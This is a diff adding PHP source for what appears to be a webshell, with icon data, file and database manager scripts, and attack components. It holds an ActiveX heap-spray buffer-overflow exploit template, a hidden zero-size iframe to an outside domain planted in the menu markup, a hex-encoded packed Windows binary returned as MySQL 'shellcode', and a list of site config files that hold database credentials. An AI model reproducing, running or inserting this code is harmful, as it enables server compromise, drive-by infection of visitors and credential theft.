+	"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+	"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+	"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+	"ADs=",
+	"js"=>
+	"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+	"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+	"a00AjYYBbc/o9HjNniUAADs=",
+	"xml"=>
+	"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+	"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+	"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+	"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+	"IQA7",
+	"mp3"=>
+	"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+	"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+	"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+	"img"=>
+	"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+	"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+	"FxEAOw==",
+	"title"=>"R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+".
+	"mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+	"ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL".
+	"I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",
+	"rar"=>"R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/".
+    "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b".
+    "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC".
+    "aNOmRcjVj02tPxPCzfkvIAA7"
+	);
+  header('Content-type: image/gif');
+  echo base64_decode($images[$img]);
+  die();
+}
+
+function css_showimg($file){
+	$it=substr($file,-3);
+	switch($it){
+		case "jpg": case "gif": case "bmp": case "png": case "ico": return 'img';break;
+		case "htm": case "tml": return 'html';break;
+		case "exe": case "com": return 'exe';break;
+		case "xml": case "doc": return 'xml';break;
+		case ".js": case "vbs": return 'js';break;
+		case "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi":case "mp4":case "mvb": return 'mp3';break;
+		case "rar": case "tar": case ".gz": case "zip":case "iso": return 'rar';break;
+  	default: return 'txt';break;
+	}
+}
+
+function css_js($num,$code = ''){
+	if($num == "shellcode"){
+		return '<%@ LANGUAGE="JavaScript" %>
+		<%
+		var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");
+		var shellcode = unescape("'.$code.'");
+		var bigblock = unescape("%u9090%u9090");
+		var headersize = 20;
+		var slackspace = headersize+shellcode.length;
+		while (bigblock.length<slackspace) bigblock+=bigblock;
+		fillblock = bigblock.substring(0, slackspace);
+		block = bigblock.substring(0, bigblock.length-slackspace);
+		while(block.length+slackspace<0x40000) block = block+block+fillblock;
+		memory = new Array();
+		for (x=0; x<300; x++) memory[x] = block + shellcode;
+		var buffer = "";
+		while (buffer.length < 1319) buffer+="A";
+		buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer;
+		act.hgs_startNotify(buffer);
+		%>';
+	}
+	html_n('<script language="javascript">');
+	if($num == "1"){
+	html_n('	function rusurechk(msg,url){
+		smsg = "FileName:[" + msg + "]\nPlease Input New File:";
+		re = prompt(smsg,msg);
+		if (re){
+			url = url + re;
+			window.location = url;
+		}
+	}
+	function rusuredel(msg,url){
+		smsg = "Do You Suer Delete [" + msg + "] ?";
+		if(confirm(smsg)){
+			URL = url + msg;
+			window.location = url;
+		} 
+	}
+	function Delok(msg,gourl)
+	{
+		smsg = "确定要删除[" + unescape(msg) + "]吗?";
+		if(confirm(smsg))
+		{
+			if(gourl == \'b\')
+			{
+				document.getElementById(\'actall\').value = escape(gourl);
+				document.getElementById(\'fileall\').submit();
+			}
+			else window.location = gourl;
+		}
+	}
+	function CheckAll(form)
+	{
+		for(var i=0;i<form.elements.length;i++)
+		{
+			var e = form.elements[i];
+			if (e.name != \'chkall\')
+			e.checked = form.chkall.checked;
+		}
+	}
+	function CheckDate(msg,gourl)
+	{
+		smsg = "当前文件时间:[" + msg + "]";
+		re = prompt(smsg,msg);
+		if(re)
+		{
+			var url = gourl + re;
+			var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
+			var r = re.match(reg);
+			if(r==null){alert(\'日期格式不正确!格式:yyyy-mm-dd hh:mm:ss\');return false;}
+			else{document.getElementById(\'actall\').value = gourl; document.getElementById(\'inver\').value = re; document.getElementById(\'fileall\').submit();}
+		}
+	}
+	function SubmitUrl(msg,txt,actid)
+	{
+		re = prompt(msg,unescape(txt));
+		if(re)
+		{
+			document.getElementById(\'actall\').value = actid;
+			document.getElementById(\'inver\').value = escape(re);
+			document.getElementById(\'fileall\').submit();
+		}
+	}');
+	}elseif($num == "2"){
+	html_n('var NS4 = (document.layers);
+var IE4 = (document.all);
+var win = this;
+var n = 0;
+function search(str){
+	var txt, i, found;
+	if(str == "")return false;
+	if(NS4){
+		if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
+		if(n == 0) alert(str + " ... Not-Find")
+	}
+	if(IE4){
+		txt = win.document.body.createTextRange();
+		for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
+			txt.moveStart("character", 1);
+			txt.moveEnd("textedit")
+		}
+		if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
+		else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
+	}
+	return false
+}
+function CheckDate(){
+	var re = document.getElementById(\'mtime\').value;
+	var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
+	var r = re.match(reg);
+	if(r==null){alert(\'日期格式不正确!格式:yyyy-mm-dd hh:mm:ss\');return false;}
+	else{document.getElementById(\'editor\').submit();}
+}');
+}elseif($num == "3"){
+	html_n('function Full(i){
+   if(i==0 || i==5){
+     return false;
+   }
+  Str = new Array(12);  
+	Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb";
+	Str[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****";
+	Str[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****";
+	Str[4] = "Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;";
+	Str[6] = "SELECT * FROM [TableName] WHERE ID<100";
+	Str[7] = "INSERT INTO [TableName](USER,PASS) VALUES(\'eanver\',\'mypass\')";
+	Str[8] = "DELETE FROM [TableName] WHERE ID=100";
+	Str[9] = "UPDATE [TableName] SET USER=\'eanver\' WHERE ID=100";
+	Str[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
+	Str[11] = "DROP TABLE [TableName]";
+	Str[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
+	Str[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";
+	if(i<=4){
+	  DbForm.string.value = Str[i];
+  }else{
+  	DbForm.sql.value = Str[i];
+  }
+  return true;
+  }');
+}
+elseif($num == "4"){
+	html_n('function Fulll(i){
+   if(i==0){
+     return false;
+   }
+  Str = new Array(8);  
+	Str[1] = "config.inc.php";
+	Str[2] = "config.inc.php";
+	Str[3] = "config_base.php";
+	Str[4] = "config.inc.php";
+	Str[5] = "config.php";
+	Str[6] = "wp-config.php";
+	Str[7] = "config.php";
+	Str[8] = "mysql.php";
+	sform.code.value = Str[i];
+  return true;
+  }');
+}
+html_n('</script>');
+}
+
+function css_left(){
+	html_n('<style type="text/css">
+	.menu{width:152px;margin-left:auto;margin-right:auto;}
+	.menu dl{margin-top:2px;}
+	.menu dl dt{top left repeat-x;}
+	.menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:152px;display:block;color:#FFFFFF;font-weight:bold;
+	text-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;}
+	.menu dl dt a:hover{color:#FFFFCC;}
+	.menu dl dd ul{list-style:none;}
+	.menu dl dd ul li a{color:#000000;height:27px;widows:152px;display:block;line-height:27px;text-indent:28px;
+	background:#BBBBBB no-repeat 13px 11px;border-color:#FFF #545454 #545454 #FFF;
+	border-style:solid;border-width:1px;}
+	.menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;font-weight:bold;}
+	</STYLE>');
+	html_n('<script language="javascript">
+	function getObject(objectId){
+	 if(document.getElementById && document.getElementById(objectId)) {
+	 return document.getElementById(objectId);
+	 }
+	 else if (document.all && document.all(objectId)) {
+	 return document.all(objectId);
+	 }
+	 else if (document.layers && document.layers[objectId]) {
+	 return document.layers[objectId];
+	 }
+	 else {
+	 return false;
+	 }
+	}
+	function showHide(objname){
+	  var obj = getObject(objname);
+	    if(obj.style.display == "none"){
+			obj.style.display = "block";
+		}else{
+			obj.style.display = "none";
+		}
+	}
+	</script><iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe><div class="menu">');
+}
+
+function css_main(){
+	html_n('<style type="text/css">
+	*{padding:0px;margin:0px;}
+	body,td{font-size: 12px;color:#00ff00;background:#292929;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}
+	body{color:#FFFFFF;font-family:Verdana, Arial, Helvetica, sans-serif;
+	height:100%;overflow-y:auto;background:#333333;SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}
+	input,select,textarea{background-color:#FFFFCC;border:1px solid #FFFFFF}
+    a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
+	.actall{background:#000000;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
+	</STYLE><body style="table-layout:fixed; word-break:break-all; FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">
+	<table width="85%" border=0 bgcolor="#555555" align="center">');
+}
+
+function css_foot(){
+	html_n('</td></tr></table>');
+}
+
+function Mysql_shellcode()
+{
+	return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000009BBB9A02DFDAF451DFDAF451DFDAF451A4C6F851DDDAF4515CC6FA51CBDAF45137C5FE518BDAF451DFDAF451DCDAF451BDC5E751DADAF451DFDAF55184DAF45137C5FF51DCDAF45137C5F051DEDAF45152696368DFDAF4510000000000000000504500004C010300B2976A460000000000000000E0000E210B01060000500000001000000090000010E6000000A0000000F000000000001000100000000200000400000000000000040000000000000000000100001000000000000002000000000010000010000000001000001000000000000010000000D8F000007400000000F00000D80000000000000000000000000000000000000000000000000000004CF100000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000900000001000000000000000040000000000000000000000000000800000E055505831000000000050000000A000000048000000040000000000000000000000000000400000E055505832000000000010000000F0000000020000004C0000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000322E303200555058210D09020A459475C59FCC587632C900000F46000000B00000260A00BC6FEDDDFF558BEC6AFF6800007148040ED064A10507506489FFD8FF9F2583EC0C5356578965E8C745FC0F7D0C0175236A00FFEDB77B012E05B008FF150970008945E4EB09B81E7363BB0124C38B2FFF000F8B4DF05FF6FFD94E0D5F5E5B8BE55DC20C0090008B442499ACFDF604C740081C100432C0C30F8F58FDAC7D0081EC8C090592C685E8FBFF77DFBD6100B9FF1733C08DBDE90DF3AB66ABAA33DB895DFC8B33DBBBFF450C8338010F85770380480439190A6C53EFFEFFBF80988B50088B0250E80A005DDC83C40885C00F84511A889DC8F6F720276B414EC9F6C785BC0A9FD9DC5D0C16899DC0090FC4D853A1FBF6DF8D8D1A518D95CCFA06528D85B80D500EB399661B2C256C44246CCDF7EFB116288B852A8985ACF605A866EEEE8C6C559C985668050134776723CD95C852240CBFBA8883C9DFDCFFB7FF9CF2AEF7D12BF98BF78BFA8BD1100E4F8BCAC1B3CDFDF6E902F3A50683E103F3A4FBF2083566B604D88B393284B4C1B5DB60E6D8FBB153006A0103FF6B63838A538B20B4283BC3752D6A0A6D84436EF0E8FB1C4F473ADBAF3D7C12516670380B52E917059E0B67B30CF72A18B9D0FA40FB0E72106AD1FA6803FA8D1D93CBD8D84268FF14D0FAC47E0990583A548D64D9BA6F3EE5117E8BF089B564B9535EC803C2993B046AA18BB810CD2ED81B0E567420C63C10FFB9E53B72C6000163E8EBBA1882FBB7B9850436D41105B0596A206A03049D306B6E037D7EB2BF0CF6B171F37B6883FEFF6A85385618DCEFEF2D94F889BD408D4764A80FF652F1DC2F942DB9590C89036A9D5679F8CFBE564F01515030108B13C6043A0009446C03E40BD18B3BD9687E2C089318580C04EB366A64B66C8DC972D031745813594ECE0E53C16551C83BE920FDC91E498B5514890AE98B03E63F61EE23C368C80B6389500C3BD37C2939D8751A3233C07F3001BB709155357A0C83910DBB954511420C8651C8D391AC91AE8D513763F24C9552CDB0069B6CC2A4E96551C51C8B6C76695D530C1FA86CB243C27B0C298B5BA5C3A71B4F08A40F8B400C8674DD5B768C07BC91591B00130BC8AEF1B72C1D750683C8FFC2C30E05DCC030D74E060C74092FF202EDB4329054554468020217F6FEBFFE7134F7D81BC04081C41A5E903D814C060F6808B8640426B073A466121C866DCBB6417B885DA87401A902ADB17EE3D2B76603B58845B71684FEF1888590FFFE7D72BB06563F84BD910AE983CF3F4F9B2E347D942C6A02227175943B5A018CEDF7751616FC1708EC3F79044888FEFE71103BC7751D560A1BC60B6C14326A107A8D74235F61B8E73A52180F66DB8D2C2C88980B531CAE9A338FCA02DD827A1D0E203DB8C9B537DC9004B9827E8B3089CAB4D6D37CB01D80B471D337110CE748BEDDEC6F6A081AA8D177E6489E04A0B6138D55A8E327325A00438D7DA883CE2D656B0763CE457537E59B512FD8B7C1028B8B8596504522D9BE1B6144418D4DA885C977DD1696139C2E06249C238D472834160750D28954283B70800CF2C67526537547C84B6CC025CF070D048CFFFEDF5EBC8549E4200866E4516A28AE11DB6E61BC52F88D2072229D489AB3985D2C1D8B35781C88D11B302A6C37DF5968311659FFFF1151BE82B96D42D6FC84FED51052D985CD06A5091CEBC5BA94506052022C069E0F3981C511788FA404FCF68450228B75087CC0807E09060A4B775B71A85F8B5E0C20D469D9D115CEF92011C8B80D124CB6177EA98AB6E00FC1E0028BC803C604C468141ADF02CC33C98A7DBFB566FBEF5E4CC1E102058D14018955E0803A4D4F586F8F818BB9AA01CC8BF2E266F3A7ED0CF26C164102C0159D0542D875477205B04C2C3908C10D00DA6E0D67EF1968D007001034E90B8795BC59C82DED1533F607B80774C03FFB9009C183C206298A023C2167DF7FE9743C843B1B3C0A741788843530421B46D889846744EBDB7FB907CABBFF6F29B6B53C33D2F3A6753B88954C0BB918D962C860784DB34C76739038C0B10B6C68E803C59378271EEB254A1D8E236534B0301BB135728144C60F4F9400D7493C77C7030B5E382E81D8BB7F1A837C2410027513060405750C5B6464046B5F23C357084F179213C888140525F1ECA263810C5456C9134CD8C9C22CBD4FE485DBCEE499566BF6CFE0FA8BCB2BCE490C0804904BB80768042700E0FE397221F724434558E0FE8108D87B96002F8BFB1B2A2327837CD98BFACBCB5073BCC8855098E0FE8D6FBFAC03B7B10DCC63DC0DAF234B21D18DC47AF02AFA7A568F638FA2C0EB0C0354AD46F2C505EED48821B01A60A081C4112684C3CFF4425689FF3B77D77857040CB911280D108D7C2418F3AB8D4C243B0D069B6C1451AB343101BA0B041B0111E5724E64F06650720D553D8755FD04BA917466380E6E8D542408D731F62D925266181108435C5C8F4F4A761850514F9481106A5CDFBFEACC4044076C1589B424809674C67652DD247C03788C5FB65E56B87B49BCBFF0FF255B3CCCCC8D87D4E1674755E7F0FF42DF86C00D5F613C5D6C7904F74104868B23B8065423740F795CEFDCD7B7A5108902B863C33E1210506AFE5C908E7F40F864FF35A900198E1AB52529582FDDD5B4BFC0ED742E3B932474FA34768B0CB38959BD2DB50A02C304B394751268F7DBBFEDBD2DB37D0EAAFF5408EBC3648F0543236C7286EA8C1A648B9C8184FF83DF7904687510E3520C3951087505CF4D05BBFB5351BB1E18EB0A082489DFDCB7B64B02439D6B0C595BFCEF56433230069F0BF758433030F7A5FAFCD82C10DBD10C74F740E42682B58DD63E3F45F812E11B8D08B67F97AD3E21737B08C1618D0C76B18FEA6EED5F744556558D6B10A80B5D5E410B33BBE85ED633783C25534F0DD41D2B38D3AF560C0E168D36B7DEDDB6C5648F358F550C3B08C77EBF73301A8B348FEBA1B8DBEB1CC9EB15884DD67A5C003F5D16466F684394BC3B8B298B419FCC256BB4031824E1D763D9B66E20CF56BDE8C0E010E24785ED75EC423C0AE0DD5B0D1A7E4DE47F34168D5AFF3ADD766B1B92784D1C8020770D2450EDC3FF4884157559598BC65EC9C3CF8DDCFAF7D7B26B71151008C3B7E0772212C7424B4F0434A759913916BDF01C6C7410131E97DEB2C3568BB5FB05D7383B42565777216A091C1FF8ECA245FBA424020C91EF2059E1DB46ED38CEC7FD85F675032863FCDA7F5E83C60F83E6F056887CA4BCC65CE23B3A6BFC4D5716F6460C4074ECEFB75D15660CB2174D29730510B35652F790357329C54E308374342411FAFEE42B502AF7FF761007176F9B34F5DD7D0525EB128B461C530B5FD2A4D87B1C0059644B2A20B25628752EE34A467A86B386F62C591AE1D81E2DFA85EFFD0A7C092CE61D90280DE157F8ED397D08470F94C0485BC31630077AC31A6E5DF1025B5756391803BA23977D6097CA146A401A0CB8CDDCF7039B4DB4DD40743DFD6E78405720AC597B741356C220D7843337E11962410B5957B4C5DA2E6018CC07835328D00CBC3010E326ABA73DB884FB1147D903CB8BFEEA5A8A4614B8F01759C93A47FF7704A94949608563EF1B385B5E5FC93A00513D7DBB8B3B1C279772148111222E2D10B5B73FF685011773EC2BC88BC40C8BE18B596EB4A32D685036C10C576D747A9BF8BAEB74D9C614F7C64D8B197507F8B77803AB756FEB21F646880747497425FF6BCFBA26291F75EB2D1D5183E303740DEE5EEF66201D2F4B75F38492C3F7C79ED9E0FD2874123AFD8A116A9B3BE93AEE6C182EFA2AD1DBC2F6C82E89FEC7D074AFBAA5DB2FB523FEC70603D083F0E8C28B4F78E1BFF5C604A900948174DE84D2742C84641EF7C26FB7B7B90F580C070875C639EB18818C34DDA3E272090E00046A2BC45A88533F550A3B6CF7EBEE075F75F8B07585A3CCFFEFDE8DC6974E8A11F161698A7101DDBF2B74644F7719148A074638D07415D90BD3D2A573E30A0A75F5FC5F51E242173E10F0078D7E436102FE3B2A50DD4E1DC60238E075C48A410376EDDDEF31188A66FF83C11074DFEBB12F348AC26B74851B9030F28DBC0CC34C05C7DB88DFFC83F8F988CC078FA7DBC668BEA3068E58BEB2427EBB8EDE3CA10E680D075925DEC12DBDD1F7FB12102760891664950803C1EDDB50F3375C32F7750940EE78769BDDD8EB7256641CA4C03968098DCC7BB3D96D345204371B366231A8FF0519627F7FBBC8EB3E6B3BC1752C390D0D7EBDFF07E6FB0AFC0D8E90E128E6320E175A89D8331A64FBC25507514EADD87E11B259BF5833A569A363097D56B457C7105EBDC0D6BB09833D482926C101740547D36EA3040322DAA4C4E809F4AED9996EFFD0080CC113CC04BCB6D410BF4E0F07EB8D01C90C4C6D6FB0BB1737575023F6467926A315ED8034032125F71F0117396C115B083C5BD8B9E241C0D01A8DD4D8B1AE6176BA310E97D801DB78C041E03A9A3A3AD3C57DCD2A7D3B8130AB756C462D6C36BE025E10A882D2F6A840B9EEDAB61BED074AA96604071017DE6EBFF77F3F4E0824FE890E89462F1883657524EF0337F72D6E66A90C0115F981FE8B03BFC75A289C0748750BC03F32AE6ABFFDD7073E3EEE5966F7270801577467420BDCB65FAC3E2BF88D48390E581849A489DEB99EF04E047E10053CFE53DCEB3683FBF6CBFFDFBA198BCB8BC3C1F90583E01F8B0C8D93808D04C002B6F4B2D08196B88498F6F320F399B156A107783A260A4B2CD15C8A9E88E614B7C0C24A0D74885507DF40A12932DF4E0C20EB0FCC16B8760C7CEB080DC2C1C8A50E864C17064802DFBA95A1E6798A1F09DB8975F411BAD06E02EC890F0EF406D1B705D74A8D370641D00939554ABF7DF7EC0F8CDC1780FB207C1304787F0E0FBE50152EC08631717461EB02F8BE2DBCBB0F84C60E94C1F804A70789D00F879A85F652EC30FF24901DB2834803CBB22CDB55CC02D8E0E4FCDCBC6DBB4D5D1D954883E8E43B0403742DC1B55EA20B1F4848840DA8D2C56E6E594039FC082708041CB28C1D0111808002C3128E9EFB2AF9B9509B687613661E6CC80F8D12469B89985B8ED80E27B476CBB2ED170A666C4441D0EBE98AF03EED5C2E641EF0D305BF30E7CE63398D0489361B346FCBDB56AE2E046874206CB880FB7790495E2EA005804DFD10EEC6FFE4203F367514807F0134CA4747271FDA628680771888D0AA8568B7C6ED0D1C0FB6C3F66601802291EC50147E06131E28981DCEB0C18DCC35EB4733181652F39BE127F8670F8F1CE508650F8D9600F9EF43DB5811EBA9847817E8430F849FB96D5D836D70036C100CB8E903AF74A146C6BE3008CCC08B25430BFDF0BD68BEFACAC54BC21921D0ADAED4DEFB894DF844E7B1C92D0E2DE47EB981381229DC7477B37D212AD64E85D220D466833878869FED5DCA094040EBE721CC80C320136B1B74AB408FB8FDF3CAD14DDB955F708DCFF3F006CB1A0D8DAFF1660377862E8848BF578089043A953F5B008DD1D6C5F490323FD80C298EDDBEBDD35A7432040974C5487CE801521C97B3B345FE3A6C59882AF4471A183147BD2002BB8916359DDE6F2CF64580D9CCB97F74170FBF00D1E8E369E652D7D8C3AD2DDC000CBF0E94AE6DB4BE6E81344D50C28D8314670B2D826B25D5165C50CCA2B5AFD483C05E08F05D4B053B6C377540FC0EBCC8D18B851FB082B8F7855082FCC9C6057EB581E69E741429F0003506BE67B324205C595D12AF788432611654562D750DD0C2BB653A29BDB9E06157A758888D8459A619694899ED2C1D0C059E0684B686FB2C805184FD331B23B1CF05F77491C9C15DD4273C602621F62BC1D1F847FD340BDB0582F6288038AF03ECF1D728176B2624FE853D6B2815CC074DBB7B10D410A6FEF65D8A13C645EA3004516377CF60DF678845EBEB4821083BC202EB35D6852E09971B209909669F08CD2DF0EC668909050706F514EB0E296A403C0A69BF1FD6A05FA53A7959EB413D74218519637405404A0C0FBB641B0CF6C099EB250BB7C8F220AFC0ECC908EBE0070E19B8F5C6DB741BE37F177C1AC073115883D2D6E2C30D9FF7DA698BFAC90B1FDEE0B50577DC83E700B27D09161B2D08FD1B2AFCAA3AC0B6FBC60BC77509E40060B733D6DEADD55E614A7F0619EE0F765B5DFDF4995250578AC009C476409C5FDB6E372AC48B66C33007C017112CCBF6DF063E39677E03035DD440F8F847D75CF78818EBB5502B0C027F02A51AEE9B03611880393075A90A009BBBEB24400FC601301A98D825DEFEB1B6F4935DFCF6C3D226F6C716CF5A8386068A2D5C0F0A2BEB47369A970902740B20C1E475E06035B6ED2B75E402F4180C7884BDDB61A91B201EF0C41011CD7C37B703EA1402E45015342C9001D94C3E3104306F6B97DA893E7441058B7EFBBB0B97688E3B78FFDD034347C8502DFC54A443DE9D7E328DE9516EA164CF3B1759984FDB962DD802C7155802F4F860A50AC977AC79A5D7193808FBF97DF729B3456313F9E86DEC99D334B75BE01830031706216D30D1354DA4ACE11B7440C6126F55424F490478DC11BA6D6C74898A02FF0EB6300BB90233E098006C4E9468254A90D68C71D8A3AE4A83B557AFA9E0B06AEA7E21B618B714AB63DB43B9833E0D07207FE3B5B628B5908B5CE81A4BE6775DD73831263C1C35100FBE065746CDE7EC505F363FC34BE26D6C3C72BE9F580081008DAE0673520C083B4163B3A177D951FC1C661D6F8DE0B474E8500F41CC5204B4702D700B30027114E0550798688478EAA3365283702294BC5DF20D50600F6E85C0750F6C60A1FBCF373E5333DB391D15B4282D5DC3431B267E44D8B8013D0E74FB768AED8D700C5540785BFF36FFD70810E0916D800A6AFF7604626BC75EEAD59C14433B487CCED915DB812D1BB81D785DF6568CFDDB41DC7078158184FFD6077415CA2083644457D42DB983867CBE100A06FE2B8F3C763BD13474230774741B647413A8AE012344D398367B845CC52BDCFF007CC45A2067C106D76A07845D1003CA44F85083EAC716DE3C856C6C3407753E576A181F3B1A1F3C8BF8D4336A113542FB8D06BC59078C08005957750ADA0E78B31F78893EEB067A1D84D9607F865F281A805E5D60FF57605AA8B11584CC40A48B4F485801B7B87501172BC5D86E2508B00006B41217B770A0FBACC70505A48BBDA118AD96AFC18DB107B88858F0E16FC47314B5042B500C81FAB27207DB210C6FBB14EBE8EC321C556E34D5880C2E6A41DEF22BA3DF60A36A5AAFC2FC57C1EE7F37AA817FCE8B7AFC69C904D24B448D8C8E1A35C50144695D695685463BF80C13F6C1012E757FFDF4B46FFAED3F495F0B0C3BCF76038E8B4C13043B03BFF84D4BF4486783F920731CBF2CD3EFBFFB5FE88D4C01C4D7217CB044FE09752B752139EB2483C1EEC15CB0E01E2D21BCB0C4124AAEF174240679F04D42ADB519DB55890A040803630DDAD6FEBB